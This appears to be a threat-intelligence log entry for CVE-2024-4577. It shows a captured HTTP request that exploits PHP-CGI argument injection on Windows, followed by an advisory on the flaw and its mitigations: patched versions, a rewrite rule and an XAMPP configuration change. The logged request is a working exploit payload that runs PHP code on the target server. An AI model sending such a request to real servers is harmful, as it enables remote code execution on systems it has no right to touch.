CVE-2024-4577

2026-06-01

139.59.136.184

germany 

PHP 

PHP 

POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput HTTP/1.0
User-Agent: Mozilla/5.0 (l9scan/2.0.833323e21313e2035313e25343; +https://leakix.net)
Host: www.███████████
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
X-Forwarded-For: ██████████████
Accept-Encoding: gzip
Connection: close

<?php $env["USERNAME"] = @get_current_user(); $env["HOSTNAME"] = @gethostname(); $env['USERNAME_SIGN'] = @md5($env["USERNAME"]); echo @json_encode($env); @die(); ?>

CVE-2024-4577 is a critical vulnerability in PHP that has a CVSS v3 score of 9.8, indicating its high severity. This vulnerability affects all versions of PHP for Windows, particularly in Traditional Chinese, Simplified Chinese, and Japanese language configurations, even in default installations using XAMPP. The vulnerability arises from the CGI engine not escaping the soft hyphen (0xAD), which PHP interprets as a real hyphen, allowing attackers to add extra arguments and exploit the system.
The vulnerability can be exploited remotely by manipulating URL parameters, leading to remote command injection. This means that an attacker can execute arbitrary PHP code on the server, reveal the source code of scripts, and potentially take full control of the affected system. The exploitation is possible if the PHP software is configured in CGI mode and if the php.exe or php-cgi.exe binaries are exposed, which is common in default XAMPP installations on Windows.
The vulnerability has been quickly weaponized, with several Proof of Concepts (PoCs) and public exploits available. Notably, the TellYouThePass Ransomware has leveraged this vulnerability to distribute its payload. The presence of the vulnerability can be identified by version number or through the use of scripts or Nuclei templates.
Given its critical nature, it is imperative to address this vulnerability promptly to prevent potential exploitation and mitigate the associated risks.

To mitigate CVE-2024-4577, it is crucial to update the PHP software to one of the new patched versions that address this vulnerability:

PHP 8.3.8
PHP 8.2.20
PHP 8.1.29

As a temporary measure, you can rewrite the following rule, which is compatible with Traditional Chinese, Simplified Chinese, and Japanese installations:
RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

For default installations of XAMPP on Windows, you may choose to comment out the following line in the httpd-xampp.conf file:
# ScriptAlias /php-cgi/ "C:/xampp/php/"

Additionally, it is advisable to evaluate migrating to more secure architectures such as Mod-PHP, FastCGI, or PHP-FPM. Regularly monitoring for updates and applying patches promptly can also help mitigate the risk of exploitation.